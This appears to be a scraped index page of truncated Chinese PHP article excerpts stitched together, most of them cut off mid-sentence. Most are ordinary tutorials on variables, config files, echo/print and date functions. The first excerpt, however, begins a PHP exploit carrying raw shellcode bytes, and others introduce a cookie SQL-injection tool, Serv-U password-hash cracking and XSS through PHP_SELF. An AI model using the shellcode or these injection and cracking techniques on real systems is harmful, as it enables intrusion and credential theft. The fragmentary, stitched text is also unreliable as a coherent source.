PHP

<?phpif (!extension_loaded("tidy")){die("you need Tidy extension loaded!");}$scode ="\xfc\xbb\xc7\xc4\x05\xc9\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85"."\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x3b\x2c\x41\xc9\xc3\xad\xc1"."\x8c\xff\x26\xa9\x0b\x87\x39

<?php/*cookies 注入也加速 工具 PHP版by 職業欠錢最近遇到一個掛了防注入的東東，COOKIE注入可行，不過手工注入太辛苦了，便四處尋找加速工具mika的工具依賴於SQL

方法一：爆破法．     最顯眼的要屬使用者名稱和密碼了，關鍵是如何破密碼呢？到網上搜了一個專門破SERV-U密碼的工具（Serv-UPassCrack1.0a.rar），太慢了，這要等到何年何月啊！乾脆用記事本開啟它的指令碼crack.vbs．看看解密原理：假設原來純文字密碼用"password_mingwen"表示，密文密碼也就是 我們在ServUDaemon.ini中看到的密碼（34位），用"password_miwen"表示,密文的前兩位合并上明文，然後經MD5加密後正

漏洞公告在http://www.sektioneins.de/advisories/SE-2008-03.txt    PHP 5 <= 5.2.5    PHP 4 <= 4.4.8    一些允許如GBK，EUC-KR,

現在很多的php軟體廠商為了一些目的都開始將自己的產品用Zend加密起來，當客戶使用的時候根本不知道程式裡面的細節，的確給那些搞安全的人很大的難度，所以一些廠商就開始認為只要是Zend過的產品都是安全的。但是其實不然，即使在不知道原代碼並且不考慮Zend破解的情況下，我們一樣可以利用

現在的web伺服器和開發工具雖然不會再出現像asp的%81那樣明顯的漏洞了，但是由於開發人員的疏忽和各種語言特性組合造成的一些奇異的漏洞仍然會存在。今天偶然讀到的XSS Woes，就詳細講述了和$_SERVER[’PHP_SELF’]相關的一個危險漏洞。$_SERVER[’PHP_SELF’]在開發的時候常會用到，一般用來引用當前網頁地址，並且它是系統自動產生的全域變數，也會有什麼問題嗎？讓我們先看看下面的代碼吧：<form action=”<?php echo $_SERVER[’

一、單引號和雙引號轉義在PHP的資料存放區過程中用得比較多，即往資料庫裡面儲存資料時候需要注意轉義單、雙引號；先說幾個PHP函數：1、addslashes — 使用反斜線引用（轉義）字串；　　返回字串，該字串為了資料庫查詢語句等的需要在某些字元前加上了反斜線。這些字元是單引號（'）、雙引號（"）、反斜線（\）與 NUL（NULL 字元）。一個使用 addslashes() 的例子是當你要往資料庫中輸入資料時。例如，將名字 O'reilly 插入到資料庫中，這就需要對其進行轉義。大多資料庫使用 \

1 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 2 <HTML> 3 <HEAD> 4 <TITLE> New Document </TITLE> 5 <META NAME="Generator" CONTENT="EditPlus"> 6 <META NAME="Author" CONTENT=""> 7 <META

1、變數聲明:如果在用到資料時，需要用到多次就聲明為變數使用。  $變數名=值強型別語言中（C,Java）,聲明變數一定要先指定類型PHP是弱類型的語言，變數的類型由儲存的值決定Isset();判斷變數是否存在Unset();刪除變數 2、變數的命名:1. 變數前一定要使用”$”, 聲明和使用都要有這個符號。2. 不能以數字開頭3.不能使用PHP的運算子號+ - * /  % &  等4. PHP可以使用系統關鍵字作為變數名5.

1、設定檔<?php//設定檔資訊define("HOST","127.10.0.1");//主機名稱define("USER","xiuxiu");//使用者名稱define("PASS","123456");//密碼define("DBNAME","student");//資料庫名define("PAGESIZE","10");//頁大小?> 2、編輯介面<?php$keyinfo=array("HOST"=>"主機名稱","USER"=>"使用者名稱","PA

以下測試僅為IIS+PHP環境下的個人測試結果，僅供參考，不定期更新彙總套件：1、要屏蔽錯誤和警告的輸出資訊，不要使用@符號，經過測試，加@符號執行函數會比不加@符號執行函數損失接近2倍的效率；       

Chrome下怎樣Debug你的PHP代碼 作者: admin 日期: 4/23/09 • 分類: web2.0 近日，我已經從Firefox轉到了Chrome。第一是因為慢，Firefox裝一把外掛程式實在是太慢了，浪費生命。第二是因為Chrome的Webkit有Google，Adobe，Apple，Nokia支援，可以說成為主流瀏覽器核心指日可待，這和Opera不同，Opera沒大款捧。

● 我喜歡「式」：constructor 建構式declaration 宣告式definition 定義式destructor  解構式expression  算式（運算式）function    函式pattern    範式、模式、樣式program     程式signature   標記式（簽名式/署名式）●我喜歡「件」：（這是個彈性非常大的可組合字）assembly （裝）配件component 組件construct構件control   控制項event    

php.ini 配置詳細選項點擊:次2010-06-21 16:36內容摘要:php.ini 或 php3.ini 是 PHP 在啟動時會讀取的設定檔。該檔案的存放路徑為 /usr/local/lib/。在 PHP 3.x 版的設定檔為 php3.ini；而在 PHP 4.x 版改為 php.ini。若 PHP 安裝成伺服器的模組，則在 Web 服務器啟動執行時會讀取，之後就不再讀取，因此改動配置的話.. php.ini 或 php3.ini 是 PHP

對於PHP，很多朋友抱怨發展問題，能力問題。還有自己以後的發展及薪水問題。還有一些口吻就是PHP不行，不適合大型架構等等。快下班了，作為一個開發PHP已經6年多了老鳥，在這裡隨意說上幾句。希望能對那些剛剛入門的PHPER有些協助。   首先任何語言的能力關鍵在於自己的技術能力。否則給你一架波音飛機，你不會開，那它都不如單車跑的快。首先作PHP程式員應該從思想上認識到這是值得驕傲的事情。因為你已經進入了FREE的領域。  

1.echo和print的區別　　PHP中echo和print的功能基本相同(輸出)，但是兩者之間還是有細微差別的。echo輸出後沒有傳回值，但print有傳回值，當其執行失敗時返回flase。因此可以作為一個普通函數來使用，例如執行下面的代碼後變數$r的值將為1。　　複製PHP內容到剪貼簿　　PHP代碼:　　$r = print “Hello

function filterStr($str) {$str = trim($str);if (function_exists('strip_tags')) {$result = strip_tags($str);} else {$farr = '/(<\/?)([a-z\d\:]+)((\s+.+?)?>)/isU';$tarr = '';$result = preg_replace($farr, $tarr, $str);}$result =

php的內建函數exec,system都可以調用系統命令(shell命令),當然還有passthru,escapeshellcmd等函數。　　在很多時候利用php的exec,system等函數調用系統命令可以協助我們更好更快的完成工作。比如前二天筆者在批量處理.rar檔案時exec就幫我了大忙了。　　今天整理一下常用的調用系統函數發出來和大家分享經驗。　　注意:要想使用這二個函數php.ini中的安全模式必須關閉，要不然為了安全起見php是不讓調用系統命令的。　　先看一下php手冊對這二個函數的

一個PHP程式員應該掌握的10項技能! 　　很多學PHP的人一直也搞不清楚，一個PHP程式員和Java程式員或者是.net程式員有什麼不同，告訴你，其實都一樣!沒有什麼不同，下面的內容，就是針對一個Java程式員掌握的技能對比PHP來說的!告訴你，它們其實是一樣的，不過是工具而已，沒有高低貴賤之分。只不過你不熟練，不知道而已! 　　1、文法：必須比較熟悉，在寫代碼的時候IDE的編輯器對某一行報錯應該能夠根據報錯資訊知道是什麼樣的語法錯誤並且知道任何修正。 　　2、命令：必須熟悉PHP帶的一些常用

PHP星期幾擷取代碼：　　1 date("l");　　2 //data就可以擷取英文的星期比如Sunday　　3 date("w");　　4 //這個可以擷取數字星期比如123，注意0是星期日　　擷取中文星期幾：　　1 $weekarray=array("日","一","二","三","四","五","六");　　2 //先定義一個數組　　3 echo "星期".$weekarray[date("w")];　　擷取指定日期是：　　1